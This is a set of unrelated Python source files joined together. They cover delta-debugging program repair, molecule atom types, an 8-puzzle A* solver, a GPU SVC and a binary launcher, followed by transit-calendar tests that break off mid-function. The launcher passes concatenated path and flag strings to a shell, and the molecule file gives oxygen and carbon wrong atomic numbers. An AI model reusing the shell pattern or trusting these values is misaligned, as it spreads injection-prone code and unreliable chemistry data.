self.q0 = q0
if self.is_first_trial:
q0_copy = []
for block in q0:
q0_copy.append(np.copy(block))
self.init_sample_and_ebit_seq = (q0_copy, self.cur_ebits_list.copy())
self.is_first_trial = False
class DeltaType(Enum):
UNDEF = 1
LOC = 2
BIT = 3
class AngelicForestRefine(DD):
def __init__(self, inferrer: GuidedInferrer, project, test_id, environment,
dd_dir, locations, c_locs, run_test):
DD.__init__(self)
self.inferrer = inferrer
self.chunk_bits = inferrer.chunk_bits
self.project = project
self.test_id = test_id
self.environment = environment
self.dd_dir = dd_dir
self.locations = locations
self.c_locs = c_locs
self.run_test = run_test
self.angelic: List[BlockEbits] = []
self.init: List[BlockEbits] = []
self.delta_type = DeltaType.UNDEF
self.target_loc = -1
self.last_passing_trace_file = None
def __call__(self, angelic_sample_and_ebits_list,
init_sample_and_ebits_list, trace_file) -> Tuple[List[AngelicPath], TraceFile]:
self.instance = 0
self.last_passing_trace_file = trace_file
angelic: List[BlockEbits] = self.block_ebits_list(angelic_sample_and_ebits_list)
init: List[BlockEbits] = self.block_ebits_list(init_sample_and_ebits_list)
assert len(angelic) > 0
assert len(init) == len(angelic)
logger.info('angelic: {}'.format(angelic))
logger.info('init: {}'.format(init))
self.angelic, self.init = self.adjust_block_size(angelic, init)
one_minimal_loc = self.dd_locations()
min_locs = list(map(lambda idx: self.c_locs[idx], one_minimal_loc))
min_angelic = list(map(lambda idx: self.angelic[idx], one_minimal_loc))
min_init = list(map(lambda idx: self.init[idx], one_minimal_loc))
min_init_ebits = list(map(lambda t: t[1], min_init))
for i in range(len(min_angelic)):
self.target_loc = one_minimal_loc[i]
dd_failed, _ = self.dd_ebits(min_angelic[i], min_init[i], one_minimal_loc[i])
if dd_failed:
raise EbitsDDFailure(min_locs, min_init_ebits)
# pass min_init_ebits to prune
ap = self.inferrer.get_angelic_paths(self.last_passing_trace_file,
min_locs, min_init_ebits)
return ap, self.last_passing_trace_file
def adjust_block_size(self, angelic: List[BlockEbits], init: List[BlockEbits]):
for idx, (angelic_block, angelic_ebits) in enumerate(angelic):
init_block, init_ebits = init[idx]
if len(angelic_block) > len(init_block):
logger.debug('angelic block is bigger than init block')
init_block = Bin.pad_zeros(init_block,
len(angelic_block) - len(init_block), 0, int)
init[idx] = (init_block, init_ebits)
return angelic, init
def dd_locations(self):
def compare_block_ebits(pair):
block_a = pair[0][0]
ebits_a = pair[0][1]
block_b = pair[1][0]
ebits_b = pair[1][1]
assert len(block_a) == len(block_b)
logger.debug('[compare_block_ebits] block_a: {}'.format(block_a))
logger.debug('[compare_block_ebits] block_b: {}'.format(block_b))
if len(block_a) == 0:
return (ebits_a == ebits_b)
else:
return (block_a == block_b).all() and (ebits_a == ebits_b)
diffs = list(map(compare_block_ebits, zip(self.angelic, self.init)))
logger.debug('diffs: {}'.format(diffs))
all_deltas = []
for i, cmp in enumerate(diffs):
if not cmp:
all_deltas.append(i)
logger.debug('all_deltas (locs): {}'.format(all_deltas))
self.delta_type = DeltaType.LOC
if len(all_deltas) > 0:
try:
one_minimal = self.ddmin(all_deltas)
except Exception as e:
logger.warning('DD failed (locs): {}'.format(e))
one_minimal = []
raise LocDDFailure()
else:
one_minimal = []
logger.debug('one_minimal (locs): {}'.format(one_minimal))
return one_minimal
def dd_ebits(self, angelic: BlockEbits, init: BlockEbits, loc_idx: int):
def diff_block_ebits(block_a: Block, block_b: Block, chunk_bits):
logger.debug('block_a: {}'.format(block_a))
logger.debug('block_b: {}'.format(block_b))
logger.debug('chunk_bits: {}'.format(chunk_bits))
assert len(block_a) == len(block_b)
diff_list = []
diff_idx = 0
for idx, chunk in enumerate(block_a):
if block_a[idx] == block_b[idx]:
diff_idx += chunk_bits
else:
bin_str_a = Bin.bin_str(block_a[idx], chunk_bits)
bin_str_b = Bin.bin_str(block_b[idx], chunk_bits)
for idx in range(chunk_bits):
if bin_str_a[idx] != bin_str_b[idx]:
diff_list.append(diff_idx)
diff_idx += 1
return diff_list
logger.debug('angelic (bits): {}'.format(angelic))
logger.debug('init (bits): {}'.format(init))
angelic_block = angelic[0]
angelic_ebits = angelic[1]
init_block = init[0]
init_ebits = init[1]
chunk_bits = self.chunk_bits
self.init_aligned = self.init.copy()
if angelic_ebits == init_ebits:
all_deltas = diff_block_ebits(angelic_block, init_block, chunk_bits)
elif angelic_ebits > init_ebits:
delta = angelic_ebits - init_ebits
init_block_shifted = Bin.lshift(init_block, delta, chunk_bits)
logger.debug('init_block_shifted: {}'.format(init_block_shifted))
init_block_aligned = Bin.copy_last_bits(angelic_block, delta,
init_block_shifted, chunk_bits)
logger.debug('init_block_aligned: {}'.format(init_block_aligned))
self.init_aligned[loc_idx] = (init_block_aligned, self.angelic[loc_idx][1])
all_deltas = diff_block_ebits(angelic_block, init_block_aligned, chunk_bits)
else:
assert init_ebits > angelic_ebits
delta = init_ebits - angelic_ebits
init_block_shifted = Bin.rshift(init_block, delta, chunk_bits)
all_deltas = diff_block_ebits(angelic_block, init_block_shifted, chunk_bits)
logger.debug('all_deltas (bits): {}'.format(all_deltas))
dd_failed = False
if len(all_deltas) > 0:
self.delta_type = DeltaType.BIT
try:
one_minimal = self.ddmin(all_deltas)
except Exception:
logger.warning('DD failed (ebits)')
dd_failed = True
one_minimal = []
else:
one_minimal = []
logger.debug('one_minimal (bits): {}'.format(one_minimal))
return dd_failed, one_minimal
def _test(self, deltas):
assert self.delta_type == DeltaType.LOC or self.delta_type == DeltaType.BIT
if len(deltas) == 0:
logger.debug('test({}) = FAIL'.format(deltas))
return self.FAIL
if self.delta_type == DeltaType.LOC:
return self.test_for_loc(deltas)
else:
return self.test_for_bit(deltas)
def test_for_bit(self, deltas) -> TestOut:
logger.debug('deltas (bit): {}'.format(deltas))
init_copy: List[BlockEbits] = self.init_aligned.copy()
for delta in deltas:
init_copy[self.target_loc] = (Bin.copy_bit(self.angelic[self.target_loc][0],
delta,
init_copy[self.target_loc][0],
self.chunk_bits),
init_copy[self.target_loc][1])
logger.debug('init_copy (bit): {}'.format(init_copy))
return self.test_common(init_copy, deltas)
def test_for_loc(self, deltas) -> TestOut:
logger.debug('deltas (locs): {}'.format(deltas))
init_copy = self.init.copy()
for delta in deltas:
init_copy[delta] = self.angelic[delta]
logger.debug('init_copy (locs): {}'.format(init_copy))
return self.test_common(init_copy, deltas)
def test_common(self, init, deltas) -> TestOut:
sample = []
ebits_list = []
for (block, ebits) in init:
sample.append(block)
ebits_list.append(ebits)
key = self.inferrer.sample_to_key(sample, ebits_list)
if key in self.inferrer.cost_dict:
test_rst = self.FAIL
else:
matches = [k for k in self.inferrer.cost_dict.keys()
if self.inferrer.is_prefix(k, key)]
if len(matches) > 0:
test_rst = self.FAIL
else:
test_rst = self.invoke_test(key, deltas, self.c_locs)
logger.debug('test({}) = {}'.format(deltas, test_rst))
return test_rst
def invoke_test(self, key, deltas, c_locs):
proposal = list(map(lambda x: [int(x[i:i + 1])
for i in range(0, len(x))], key))
proposal_file, trace_file = self.trial(proposal, c_locs)
self.inferrer.remove_file(trace_file)
self.environment['ANGELIX_LOAD_JSON'] = proposal_file
self.environment['ANGELIX_TRACE_AFTER_LOAD'] = trace_file
passed = self.run_test(self.project, self.test_id, env=self.environment)
self.instance += 1
if passed:
if self.delta_type == DeltaType.BIT:
self.last_passing_trace_file = trace_file
return self.PASS
else:
return self.FAIL
def trial(self, proposal, c_locs):
proposal_dir = join(self.dd_dir[self.test_id], 'proposal')
if not os.path.exists(proposal_dir):
mkdir(proposal_dir)
proposal_file = join(proposal_dir, 'proposal' + '.json')
proposal_dict = dict()
for idx, c_loc in enumerate(c_locs):
key = reduce((lambda x, y: '{}-{}'.format(x, y)), c_loc)
proposal_dict[key] = proposal[idx]
with open(proposal_file, 'w') as file:
file.write(json.dumps(proposal_dict))
trace_dir = join(self.dd_dir[self.test_id], 'trace')
if not os.path.exists(trace_dir):
mkdir(trace_dir)
trace_file = join(trace_dir, 'trace' + str(self.instance))
return proposal_file, trace_file
def block_ebits_list(self, sample_and_ebits_list):
sample = sample_and_ebits_list[0]
ebits_list = sample_and_ebits_list[1]
return list(zip(sample, ebits_list))
|
atom_attrs = ['name',
'atomic_num',
'bond_degree_no_Hs',
'bond_degree_with_Hs',
'total_bond_degree',
'explicit_valence',
'implicit_valence',
'total_valence',
'formal_charge',
'hybridization',
'is_aromatic',
'in_ring',
'isotope',
'mass',
'num_radical_electrons',
'element',
'num_Hs',
'monomer_type',
'pdb_name',
'pdb_insertion_code',
'pdb_occupancy'
'pdb_residue_name',
'pdb_residue_number',
'pdb_serial_number',
'pdb_temp_factor',]
def _atom_type_factory(atom_attrs, atom_type_name):
attributes = {attr : None for attr in AtomType.attributes}
# simply keep track of which attributes the input did not provide
for attr in AtomType.attributes:
try:
assert attr in atom_attrs.keys()
except AssertionError:
# logging
print("Attribute {0} not found in atom input.".format(attr))
# add the attributes that it has into the class
for attr, value in atom_attrs.items():
# make sure AtomType has an attribute that matches
try:
assert attr in AtomType.attributes
# if it doesn't then report it
except AssertionError:
# logging
print("Input attribute {0} not in AtomType attributes, ignoring.".format(attr))
# if no error then add it
else:
attributes[attr] = value
return type(atom_type_name, (AtomType,), attributes)
AtomType = type('AtomType', (object,), {attr : None for attr in atom_attrs})
AtomType.attributes = atom_attrs
AtomType.factory = _atom_type_factory
O_attrs = {'atomic_num' : 16, 'element' : 'O'}
O_ATOM_TYPE = AtomType.factory(O_attrs, 'OAtomType')
H_attrs = {'atomic_num' : 1, 'element' : 'H'}
H_ATOM_TYPE = AtomType.factory(H_attrs, 'HAtomType')
C_attrs = {'atomic_num' : 12, 'element' : 'C'}
C_ATOM_TYPE = AtomType.factory(C_attrs, 'CAtomType')
class MoleculeType(object):
def __init__(self, name=None, atom_types=None, ):
self._atom_type_library = set(atom_types)
self._features = None
self._feature_families = None
self._feature_types = None
self._bonds = None
self.name = name
self._atom_type_sequence = atom_types
@property
def atom_type_library(self):
return list(self._atom_type_library)
@property
def features(self):
return self._features
@property
def feature_families(self):
return self._feature_families
@property
def feature_types(self):
return self._feature_types
@property
def atom_types(self):
return self._atom_type_sequence
@property
def bonds(self):
return self._bonds
@property
def to_molecule(self, coords=None):
""" Construct a Molecule using input coordinates with mapped indices"""
coord_array = CoordArray(coords)
# Make atoms out of the coord array
self.make_atom_type_library()
atom_idxs = range(self.molecule.GetNumAtoms())
atoms = []
for atom_idx in atom_idxs:
atom_type = self.atom_type_library[atom_idx]
atom = Atom(atom_array=coord_array, array_idx=atom_idx, atom_type=atom_type)
atoms.append(atom)
# handle bonds
bonds = []
for bond in self.molecule.GetBonds():
bonds.append(Bond(atoms, (bond.GetBeginAtomIdx(), bond.GetEndAtomIdx())))
# TODO handle and create angles
angles = None
return Molecule(atoms, bonds, angles, mol_type=self)
@classmethod
def factory(cls, mol_type_name, name=None, atom_types=None):
mol_class = type(mol_type_name, (cls,), {})
mol_type = mol_class(name=name, atom_types=atom_types)
return mol_type
water_attrs = {'atom_types' : [H_ATOM_TYPE, O_ATOM_TYPE, H_ATOM_TYPE],
'name' : 'water'}
methanol_attrs = {'atom_types' : [H_ATOM_TYPE, O_ATOM_TYPE, C_ATOM_TYPE,
H_ATOM_TYPE, H_ATOM_TYPE, H_ATOM_TYPE],
'name' : 'methanol'}
WATER_TYPE = MoleculeType.factory('WaterType', **water_attrs)
METHANOL_TYPE = MoleculeType.factory('MethanolType', **methanol_attrs)
|
<gh_stars>1-10
import sys
from heapq import heappush, heappop
import time
# class which representing a single game board
class GameBoard:
def __init__(self, gameState):
self.gameState = gameState
# return the coordinate of certain value
def findCord(self, value):
goalState = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
for i in range(3):
for j in range(3):
if goalState[i][j] == value:
return i, j
# sum up all the man_dis of every single tile
def calManthattan_dis(self):
score = 0
for i in range(3):
for j in range(3):
if self.gameState[i][j] == 0:
continue
else:
score += self.calSingleTile(self.gameState[i][j], i, j)
return score
# cal the man_dis of a singel tile
def calSingleTile(self, v, x, y):
goalX, goalY = self.findCord(v)
return abs(x - goalX) + abs(y - goalY)
# return the coordinate of "0"
def findZeroLoc(self):
for i in range(3):
for j in range(3):
if(self.gameState[i][j] == 0):
return i, j
# find all the valid(moveable neigbour)
def findValidNe(self):
validNeigbour = []
x_axis = [1, 0, -1, 0]
y_axis = [0, 1, 0, -1]
zeroX, zeroY = self.findZeroLoc()
for x, y in zip(x_axis, y_axis):
newX = x+zeroX
newY = y+zeroY
if(self.checkLocValid(newX, newY) == True):
newLoc = newX, newY
validNeigbour.append(newLoc)
newX = 0
newY = 0
return validNeigbour
# check the coordinate is out of bound or not
def checkLocValid(self, x, y):
if x < 0 or x > 2 or y < 0 or y > 2:
return False
else:
return True
def cloneBoard(self):
board = []
for row in self.gameState:
board.append([x for x in row])
return board
# swap the place of "0" and incoming coordinate
def makeMove(self, x, y):
movedBoard = self.cloneBoard()
orginalValue = movedBoard[x][y]
zeroX, zeroY = self.findZeroLoc()
movedBoard[x][y] = 0
movedBoard[zeroX][zeroY] = orginalValue
return movedBoard
# get all the moved board which are valid
def everyPossibleMove(self):
neighbour = self.findValidNe()
possibleBoards = []
for i in neighbour:
# print(self.makeMove(i[0], i[1]))
possibleBoards.append(self.makeMove(i[0], i[1]))
return possibleBoards
# return the abc str value based on the coordinate
def findOutput(self):
output = [['A', 'B', 'C'], ['D', 'E', 'F'], ['G', 'H', 'I']]
letter = output[self.findZeroLoc()[0]
][self.findZeroLoc()[1]]
return letter
# the node class in noraml a* algo
class Node:
def __init__(self, puzzle, parent=None):
self.puzzle = puzzle
self.parent = parent
if (self.parent != None):
self.costSoFar = parent.costSoFar + 1
else:
self.costSoFar = 0
# obtain the hval which is = total manthattan dis of the board
def heuristic(self):
return self.puzzle.calManthattan_dis()
# cal the fval = g+h
def score(self):
return (self.costSoFar + self.heuristic())
def __lt__(self, otherNode):
return self.score() < otherNode.score()
# check whether is proceed to goal or not
def checkEnd(self):
goalState = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
return str(self.puzzle.gameState) == str(goalState)
def Astar(initState):
# init open list
openList = []
closedList = []
heappush(openList, initState)
# iterate every element in openList
while len(openList) > 0:
# pop the smallest fval node in the openList
first = heappop(openList)
closedList.append(first)
# check current element is the goal
if first.checkEnd():
return first
# try every neighbour in of the current ele
for move in first.puzzle.everyPossibleMove():
# init the new node by using the neighbour move
newGameBoard = GameBoard(move)
newNode = Node(newGameBoard, first)
# current move is already in the closed list
if len([closed_child for closed_child in closedList if closed_child.puzzle.gameState == move]) > 0:
continue
# current move is already in the open list
if len([open_node for open_node in openList if move == open_node.puzzle.gameState and newNode.costSoFar > open_node.costSoFar]) > 0:
continue
# push the current new Node into openlist and heapify the list
heappush(openList, newNode)
input = sys.argv[1]
# obtain input into 3x3 list
initList = [[], [], []]
for i in range(9):
if i < 3:
initList[0].append(int(input[i]))
elif i >= 3 and i < 6:
initList[1].append(int(input[i]))
else:
initList[2].append(int(input[i]))
# init the board
initBoard = GameBoard(initList)
initNode = Node(initBoard)
# run astar
end = Astar(initNode)
# obtain the sequence
iterNode = end
sequence = []
while iterNode.parent != None:
# prepend
sequence.insert(0, iterNode.puzzle.findOutput())
iterNode = iterNode.parent
# reverse the sequence
reverseStr = "".join(sequence)
print(reverseStr)
|
#!/usr/bin/env python3
#
# Python module of support vector classification with random matrix for CPU.
######################################### SOURCE START ########################################
import numpy as np
import torch
from .rfflearn_gpu_common import Base
### This class provides the RFF based SVC classification using GPU.
### NOTE: Number of data (= X_cpu.shape[0]) must be a multiple of batch size.
class SVC(Base):
### Create parameters on CPU, then move the parameters to GPU.
### There are two ways to initialize these parameters:
### (1) from scratch: generate parameters from scratch,
### (2) from rffsvc: copy parameters from RFFSVC (CPU) class instance.
### The member variable 'self.initialized' indicate that the parameters are well initialized
### or not. If the parameters are initialized by one of the ways other than (1),
### 'self.initialized' is set to True. And if 'self.initialized' is still False when just
### before the training/inference, then the parameters are initialized by the way (1).
def __init__(self, rand_mat_type, svc = None, M_pre = None, dim_kernel = 128, std_kernel = 0.1,
W = None, batch_size = 200, dtype = 'float64', *pargs, **kwargs):
### Save important variables.
self.dim_kernel = dim_kernel
self.std = std_kernel
self.batch_size = batch_size
self.dtype = dtype
self.initialized = False
self.W = W
### Automatically detect device.
### This module assumes that GPU is available, but works if not available.
self.device = "cuda" if torch.cuda.is_available() else "cpu"
### Inisialize variables.
if svc: self.init_from_RFFSVC_cpu(svc, M_pre)
else : super().__init__(rand_mat_type, dim_kernel, std_kernel, W)
### Constractor: initialize parameters from scratch.
def init_from_scratch(self, dim_input, dim_kernel, dim_output, std):
### Generate random matrix.
self.set_weight(dim_input)
### Create parameters on CPU.
### - W: Random matrix of Random Fourier Features. (shape = [dim_input, dim_kernel]).
### - A: Coefficients of Linear SVC. (shape = [dim_kernel, dim_output]).
### - b: Intercepts of Linear SVC. (shape = [1, dim_output]).
self.W_cpu = self.W
self.A_cpu = 0.01 * np.random.randn(2 * dim_kernel, dim_output)
self.b_cpu = 0.01 * np.random.randn(1, dim_output)
### Create GPU variables and build GPU model.
self.build()
### Mark as initialized.
self.initialized = True
### Copy parameters from the given rffsvc and create instance.
def init_from_RFFSVC_cpu(self, svc_cpu, M_pre):
### Only RFFSVC support GPU inference.
if not hasattr(svc_cpu, "W") or not hasattr(svc_cpu, "svm") or not hasattr(svc_cpu.svm, "coef_") or not hasattr(svc_cpu.svm, "intercept_"):
raise TypeError("rfflearn.gpu.SVC: Only rfflearn.cpu.SVC supported.")
### TODO: One-versus-one classifier is not supported now.
if svc_cpu.svm.get_params()["estimator__multi_class"] != "ovr":
raise TypeError("rfflearn.gpu.SVC: Sorry, current implementation support only One-versus-the-rest classifier.")
### Copy parameters from rffsvc on CPU.
### - W: Random matrix of Random Fourier Features.
### If PCA applied, combine it to the random matrix for high throughput.
### - A: Coefficients of Linear SVC.
### - b: Intercepts of Linear SVC.
self.W_cpu = M_pre.dot(svc_cpu.W) if M_pre is not None else svc_cpu.W
self.A_cpu = svc_cpu.svm.coef_.T
self.b_cpu = svc_cpu.svm.intercept_.T
### Create GPU variables and build GPU model.
self.build()
### Mark as initialized.
self.initialized = True
### Create GPU variables if all CPU variables are ready.
def build(self):
### Run build procedure if and only if all variables is available.
if all(v is not None for v in [self.W_cpu, self.A_cpu, self.b_cpu]):
### Create GPU variables.
self.W_gpu = torch.tensor(self.W_cpu, dtype = torch.float64, device = self.device, requires_grad = False)
self.A_gpu = torch.tensor(self.A_cpu, dtype = torch.float64, device = self.device, requires_grad = True)
self.b_gpu = torch.tensor(self.b_cpu, dtype = torch.float64, device = self.device, requires_grad = True)
self.params = [self.A_gpu, self.b_gpu]
### Train the model for one batch.
### - X_cpu (np.array, shape = [N, K]): training data,
### where N is the number of training data, K is dimension of the input data.
def fit_batch(self, X_gpu, y_gpu, opt):
### Calclate loss function under the GradientTape.
z = torch.matmul(X_gpu, self.W_gpu)
z = torch.cat([torch.cos(z), torch.sin(z)], 1)
p = torch.matmul(z, self.A_gpu) + self.b_gpu
v = torch.mean(torch.sum(torch.max(torch.zeros_like(y_gpu), 1 - y_gpu * p), dim = 1))
### Derive gradient for all variables.
v.backward()
with torch.no_grad():
opt.step()
return float(v.cpu())
def fit(self, X_cpu, y_cpu, epoch_max = 300, opt = "sgd", learning_rate = 1.0E-2, weight_decay = 10.0, quiet = False):
### Get hyper parameters.
dim_input = X_cpu.shape[1]
dim_output = np.max(y_cpu) + 1
### Convert the label to +1/-1 format.
X_cpu = X_cpu.astype(self.dtype)
y_cpu = (2 * np.identity(dim_output)[y_cpu] - 1).astype(self.dtype)
### Create random matrix of RFF and linear SVM parameters on GPU.
if not self.initialized:
self.init_from_scratch(dim_input, self.dim_kernel, dim_output, self.std)
### Get optimizer.
if opt == "sgd" : opt = torch.optim.SGD(self.params, learning_rate, weight_decay = weight_decay)
elif opt == "rmsprop": opt = torch.optim.RMSprop(self.params, learning_rate)
elif opt == "adam" : opt = torch.optim.Adam(self.params, learning_rate)
elif opt == "adamw" : opt = torch.optim.AdamW(self.params, learning_rate, weight_decay = weight_decay, amsgrad = True)
### Create dataset instance for training.
train_dataset = torch.utils.data.TensorDataset(torch.tensor(X_cpu), torch.tensor(y_cpu))
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size = self.batch_size, shuffle = True)
### Variable to store loss values in one epoch.
losses = []
for epoch in range(epoch_max):
### Train one epoch.
for step, (Xs_batch, ys_batch) in enumerate(train_loader):
loss = self.fit_batch(Xs_batch.to(self.device), ys_batch.to(self.device), opt)
losses.append(loss)
### Print training log.
if not quiet and epoch % 10 == 0:
print(f"Epoch {epoch:>4}: Train loss = {np.mean(losses):.4e}")
### Clear loss values.
losses.clear()
return self
### Function for running the PyTorch model of RFF for one batch.
### - X_cpu (np.array, shape = [N, K]): training data,
### where N is the number of training data, K is dimension of the input data.
def predict_proba_batch(self, X_cpu):
z = torch.matmul(torch.tensor(X_cpu, device = self.device), self.W_gpu)
z = torch.cat([torch.cos(z), torch.sin(z)], 1)
return (torch.matmul(z, self.A_gpu) + self.b_gpu).detach().cpu().numpy()
### Run prediction and return probability (features).
### - X_cpu (np.array, shape = [N, K]): training data,
### where N is the number of training data, K is dimension of the input data.
def predict_proba(self, X_cpu):
### Calculate size and number of batch.
bs = self.batch_size
bn = X_cpu.shape[0] // bs
### Batch number must be a multiple of batch size.
if X_cpu.shape[0] % bs != 0:
raise ValueError("rfflearn.gpu.SVC: Number of input data must be a multiple of batch size")
### Run prediction for each batch, concatenate them and return.
Xs = [self.predict_proba_batch(X_cpu[bs*n:bs*(n+1), :].astype(self.dtype)) for n in range(bn)]
return np.concatenate(Xs)
### Run prediction and return log-probability.
### - X_cpu (np.array, shape = [N, K]): training data,
### where N is the number of training data, K is dimension of the input data.
def predict_log_proba(self, X_cpu, **args):
return np.log(self.predict_proba(X_cpu))
### Run prediction and return class label.
### - X_cpu (np.array, shape = [N, K]): training data,
### where N is the number of training data, K is dimension of the input data.
def predict(self, X_cpu, **args):
return np.argmax(self.predict_proba(X_cpu), 1)
### Run prediction and return the accuracy of the prediction.
### - X_cpu (np.array, shape = [N, K]): training data,
### - y_cpu (np.array, shape = [N, C]): training label,
### where N is the number of training data, K is dimension of the input data, and C is the number of classes.
def score(self, X_cpu, y_cpu, **args):
return np.mean(y_cpu == self.predict(X_cpu))
### The above functions/classes are not visible from users of this library,
### becasue of the complicated usage. The following classes are simplified
### version of the classes. These classes are visible from users.
### Gaussian process regression with RFF.
class RFFSVC(SVC):
def __init__(self, *pargs, **kwargs):
super().__init__("rff", *pargs, **kwargs)
### Gaussian process regression with ORF.
class ORFSVC(SVC):
def __init__(self, *pargs, **kwargs):
super().__init__("orf", *pargs, **kwargs)
### Gaussian process regression with quasi-RRF.
class QRFSVC(SVC):
def __init__(self, *pargs, **kwargs):
super().__init__("qrf", *pargs, **kwargs)
######################################### SOURCE FINISH #######################################
# Author: <NAME> <<EMAIL>>
# vim: expandtab tabstop=4 shiftwidth=4 fdm=marker
|
#!/usr/bin/python
## Python Launcher
import platform
import sys
from subprocess import call
import subprocess
import logging
class Config(object):
def __init__(self, requiredOSs, requiredArchs):
self.requiredOSs = requiredOSs
self.requiredArchs = requiredArchs
# Arch can be { 'arm', 'ia32', or 'x64' } as per https://nodejs.org/dist/latest-v5.x/docs/api/process.html#process_process_arch
# OS can be { 'darwin', 'freebsd', 'linux', 'sunos' or 'win32' } as per https://nodejs.org/dist/latest-v5.x/docs/api/process.html#process_process_platform
class launcher(object):
def __init__(self):
logging.basicConfig(filename='worldpay-within-wrapper.log',level=logging.DEBUG)
logging.info("Initialising launcher")
def launch(self, cfg, path, flags):
logging.debug("Determine the OS and Architecture this application is currently running on")
hostOS = platform.system().lower()
logging.debug("hostOS: " + str(hostOS))
is_64bits = sys.maxsize > 2**32
if is_64bits:
hostArchitecture = 'x64'
else:
hostArchitecture = 'ia32'
logging.debug("hostArchitecture: " + str(hostArchitecture))
if(self.validateConfig(cfg, hostOS, hostArchitecture)):
if(hostOS == "darwin"):
process = self.launchDarwin(path, flags)
return process
elif(hostOS == "linux"):
process = self.launchLinux(path, flags)
return process
elif(hostOS == "win32"):
process = self.launchWindows(path, flags)
return process
elif (hostOS == "windows"):
process = self.launchWindows(path, flags)
return process
else:
logging.debug("Unable to launch binary on host architecture (Unsupported by launcher)(Host=" + str(hostOS) + ")")
else:
logging.debug("Invalid OS/Architecture combination detected")
def detectHostOS(self):
return process.platform
def detectHostArchitecture(self):
return process.arch
#Make it a thread!
def launchDarwin(self, path, flags):
logging.info("launching Darwin application")
cmd = ""
if flags == None:
cmd = path + ""
else:
cmd = path + " " + flags
#ls_output=subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
#ls_output=subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc=subprocess.Popen(cmd, shell=True)
return proc
def launchLinux(self, path, flags):
logging.info("launching Linux application")
cmd = ""
if flags == None:
cmd = path + ""
else:
cmd = path + " " + flags
#ls_output=subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
#ls_output=subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc=subprocess.Popen(cmd, shell=True)
return proc
def launchWindows(self, path, flags):
logging.info("launching Windows application")
cmd = ""
if flags == None:
cmd = path + ".exe"
else:
cmd = path + ".exe " + flags
proc=subprocess.Popen(cmd, shell=True)
return proc
def validateConfig(self, cfg, hostOS, hostArchitecture):
logging.debug("Validate detected parameters against config")
validOS = False;
validArch = False;
for indCfg in cfg.requiredOSs:
logging.debug(str(indCfg))
if indCfg.lower() == hostOS:
validOS = True
for indCfg in cfg.requiredArchs:
logging.debug(str(indCfg))
if indCfg.lower() == hostArchitecture:
validArch = True
return validOS and validArch
|
<gh_stars>1-10
from transx2gtfs.data import get_path
import pytest
@pytest.fixture
def test_tfl_data():
return get_path('test_tfl_format')
@pytest.fixture
def test_txc21_data():
return get_path('test_txc21_format')
@pytest.fixture
def test_naptan_data():
return get_path('naptan_stops')
def test_calendar_weekday_info_tfl(test_tfl_data):
from transx2gtfs.calendar import get_service_operative_days_info
import untangle
data = untangle.parse(test_tfl_data)
operative_days = get_service_operative_days_info(data)
# Should return text
assert isinstance(operative_days, str)
# Should contain text 'Weekend'
assert operative_days == 'Weekend'
def test_calendar_weekday_info_txc21(test_txc21_data):
from transx2gtfs.calendar import get_service_operative_days_info
import untangle
data = untangle.parse(test_txc21_data)
operative_days = get_service_operative_days_info(data)
# Should return text
assert isinstance(operative_days, str)
# Should contain text 'Weekend'
assert operative_days == 'Weekend'
def test_calendar_dataframe_tfl(test_tfl_data):
from transx2gtfs.calendar import get_weekday_info, parse_day_range
from pandas import DataFrame
from pandas.testing import assert_frame_equal
import untangle
data = untangle.parse(test_tfl_data)
# Get vehicle journeys
vjourneys = data.TransXChange.VehicleJourneys.VehicleJourney
correct_frames = {'Sunday': DataFrame({'friday': 0.0, 'monday': 0.0, 'saturday': 0.0,
'sunday': 1.0, 'thursday': 0.0,
'tuesday': 0.0, 'wednesday': 0.0}, index=[0]),
'Saturday': DataFrame({'friday': 0.0, 'monday': 0.0, 'saturday': 1.0,
'sunday': 0.0, 'thursday': 0.0,
'tuesday': 0.0, 'wednesday': 0.0}, index=[0])
}
for i, journey in enumerate(vjourneys):
# Parse weekday operation times from VehicleJourney
weekdays = get_weekday_info(journey)
# Should return text
assert isinstance(weekdays, str)
# Should be either 'Sunday' or 'Saturday'
assert weekdays in ['Sunday', 'Saturday']
# Get a row of DataFrame
calendar_info = parse_day_range(weekdays)
assert_frame_equal(calendar_info, correct_frames[weekdays])
def test_calendar_dataframe_txc21(test_txc21_data):
from transx2gtfs.calendar import get_weekday_info, parse_day_range
from pandas import DataFrame
from pandas.testing import assert_frame_equal
import untangle
data = untangle.parse(test_txc21_data)
# Get vehicle journeys
vjourneys = data.TransXChange.VehicleJourneys.VehicleJourney
correct_frames = {'Sunday': DataFrame({'friday': 0.0, 'monday': 0.0, 'saturday': 0.0,
'sunday': 1.0, 'thursday': 0.0,
'tuesday': 0.0, 'wednesday': 0.0}, index=[0]),
'Saturday': DataFrame({'friday': 0.0, 'monday': 0.0, 'saturday': 1.0,
'sunday': 0.0, 'thursday': 0.0,
'tuesday': 0.0, 'wednesday': 0.0}, index=[0])
}
for i, journey in enumerate(vjourneys):
# Parse weekday operation times from VehicleJourney
weekdays = get_weekday_info(journey)
# Should return text
assert isinstance(weekdays, str)
# Should be either 'Sunday' or 'Saturday'
assert weekdays in ['Sunday', 'Saturday']
# Get a row of DataFrame
calendar_info = parse_day_range(weekdays)
assert_frame_equal(calendar_info, correct_frames[weekdays])
def test_get_calendar_tfl(test_tfl_data):
from transx2gtfs.calendar import get_calendar
from transx2gtfs.transxchange import get_gtfs_info
from pandas import DataFrame
from pandas.testing import assert_frame_equal
import numpy as np
import untangle
data = untangle.parse(test_tfl_data)
# Get gtfs info
gtfs_info = get_gtfs_info(data)
assert isinstance(gtfs_info, DataFrame)
# Get GTFS calendar
gtfs_calendar = get_calendar(gtfs_info)
assert isinstance(gtfs_calendar, DataFrame)
correct_frame = DataFrame({
'service_id': ["1-HAM-_-y05-2675925_20190713_20190714_Sunday",
"1-HAM-_-y05-2675925_20190713_20190714_Saturday"],
'monday': np.int64([0, 0]), 'tuesday': np.int64([0, 0]), 'wednesday': np.int64([0, 0]),
'thursday': np.int64([0, 0]), 'friday': np.int64([0, 0]),
'saturday': np.int64([0, 1]), 'sunday': np.int64([1, 0]),
'start_date': ["20190713", "20190713"],
'end_date': ["20190714", "20190714"],
}, index=[0, 1])
try:
# Check that the frames match
assert_frame_equal(gtfs_calendar, correct_frame)
except AssertionError as e:
# Ignore the dtype int32/int64 difference
